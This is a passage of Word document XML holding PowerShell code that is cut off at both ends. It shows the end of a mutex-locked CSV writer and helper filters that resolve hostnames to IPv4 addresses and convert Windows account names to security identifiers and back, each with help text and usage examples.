        <w:t xml:space="preserve">    $Mutex = New-Object System.Threading.Mutex $False,'CSVMutex';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F8ADE03" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $Null = $Mutex.WaitOne()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D740C67" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="180CBA2A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    if (Test-Path -Path $OutFile) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B4EA2B8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        # hack to skip the first line of output if the file already exists</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52C52EEE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ObjectCSV | ForEach-Object { $Start=$True }{ if ($Start) {$Start=$False} else {$_} } | Out-File -Encoding 'ASCII' -Append -FilePath $OutFile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A6423D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12481FF0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73FE04BD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ObjectCSV | Out-File -Encoding 'ASCII' -Append -FilePath $OutFile</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7308BC98" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31380FD3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4EC3EE30" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $Mutex.ReleaseMutex()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D958DCA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D6D5CDD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="67908C5C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2F658BDA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>filter Get-IPAddress {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65B2E948" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>&lt;#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BAC6D1D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .SYNOPSIS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E2B1F9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="53D27F63" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Resolves a given hostename to its associated IPv4 address. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D6DE250" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        If no hostname is provided, it defaults to returning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B8FFFBE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        the IP address of the localhost.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E52C5FC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="38822399" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="739C7042" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="538B7F59" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Get-IPAddress -ComputerName SERVER</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A15E69" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EAFBD42" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Return the IPv4 address of 'SERVER'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26FC6206" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3B4939E0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="033E1AF9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="009D78B6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Get-Content .\hostnames.txt | Get-IPAddress</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="342C7EB7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2A05FD7B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Get the IP addresses of all hostnames in an input file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42DA178F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>#&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C6B02A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="386109EF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    [CmdletBinding()]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DC6E505" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    param(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="524CF0CB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Parameter(Position=0, ValueFromPipeline=$True)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CBE7EE0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Alias('HostName')]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63163D20" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6733E83D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ComputerName = $Env:ComputerName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D61506A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2956CDB2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="021E01AE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="543325C9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        # extract the computer name from whatever object was passed on the pipeline</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="493D64FE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Computer = $ComputerName | Get-NameField</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53582E01" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="78E9AC02" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        # get the IP resolution of this specified hostname</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3778CC27" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        @(([Net.Dns]::GetHostEntry($Computer)).AddressList) | ForEach-Object {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="303CBEB9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            if ($_.AddressFamily -eq 'InterNetwork') {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="256D8EC8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $Out = New-Object PSObject</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="770B64BF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $Out | Add-Member Noteproperty 'ComputerName' $Computer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B24E847" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $Out | Add-Member Noteproperty 'IPAddress' $_.IPAddressToString</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21EFAD0F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">                $Out</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02CED3F2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">            }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53A5A6EE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1501E543" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C4FBEF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    catch {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1401A2F8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Write-Verbose -Message 'Could not resolve host to an IP Address.'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD5BED7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C07012B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23C497E7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4804451F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="66DC85AF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>filter Convert-NameToSid {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35017918" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&lt;#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="148F647D" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .SYNOPSIS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C0ECFEC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3F4B79A2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Converts a given user/group name to a security identifier (SID).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D862114" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="2DAFE551" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER ObjectName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FFD213A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="3CF08EE1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The user/group name to convert, can be 'user' or 'DOMAIN\user' format.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73A61B49" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4671BFA6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER Domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14D20E29" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5975FFFA" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Specific domain for the given user account, defaults to the current domain.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EEA05CB" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="12ED0CC6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B0FBB1B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="1589D6F9" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Convert-NameToSid 'DEV\dfm'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6408D1F7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>#&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="416BE3D2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    [CmdletBinding()]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="630FC920" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    param(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA3C8A8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Parameter(Mandatory=$True, ValueFromPipeline=$True)]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7955D4C8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CD0F151" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [Alias('Name')]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26C6A996" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ObjectName,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E64AE65" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="6783166E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        [String]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B006D94" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Domain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A7884A8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C85FC39" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="0B29CC5C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    $ObjectName = $ObjectName -Replace "/","\"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D919AFE" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F3FD9B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    if($ObjectName.Contains("\")) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C54FC65" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        # if we get a DOMAIN\user format, auto convert it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1363ADC6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Domain = $ObjectName.Split("\")[0]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="720E3ACD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $ObjectName = $ObjectName.Split("\")[1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26F2BB51" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4908DB2E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    elseif(-not $Domain) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73CD5BDC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Domain = (Get-NetDomain).Name</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2849F332" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38038AC6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="7AEF9DF3" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    try {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558B732E" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Obj = (New-Object System.Security.Principal.NTAccount($Domain, $ObjectName))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61CE87F2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $SID = $Obj.Translate([System.Security.Principal.SecurityIdentifier]).Value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B423FC1" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4794BE15" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Out = New-Object PSObject</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="304D05D8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Out | Add-Member Noteproperty 'ObjectName' $ObjectName</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E5FD9F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Out | Add-Member Noteproperty 'SID' $SID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="333F818C" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Out</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2659A7F6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="588D4283" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    catch {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E3D73A2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Write-Verbose "Invalid object/name: $Domain\$ObjectName"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5689D1BC" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        $Null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="004008DF" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A0F1E2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="406C3EA6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="13AC3C7A" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="5198C373" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>filter Convert-SidToName {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C8EF648" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>&lt;#</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="438B0A63" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .SYNOPSIS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="481A56E6" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="358494B7" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        Converts a security identifier (SID) to a group/user name.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A49FE2F" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="43A91269" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .PARAMETER SID</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48342EF8" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14FABE5B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        The SID to convert.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72656FDD" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="38816413" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    .EXAMPLE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E9113B" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447"/>
    <w:p w14:paraId="4646E697" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">        PS C:\&gt; Convert-SidToName S-1-5-21-2620891829-2411261497-1773853088-1105</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="290906C0" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t>#&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A54A9B2" w14:textId="77777777" w:rsidR="002C4447" w:rsidRDefault="002C4447" w:rsidP="002C4447">
      <w:r>
        <w:t xml:space="preserve">    [CmdletBinding()]</w:t>
      </w:r>
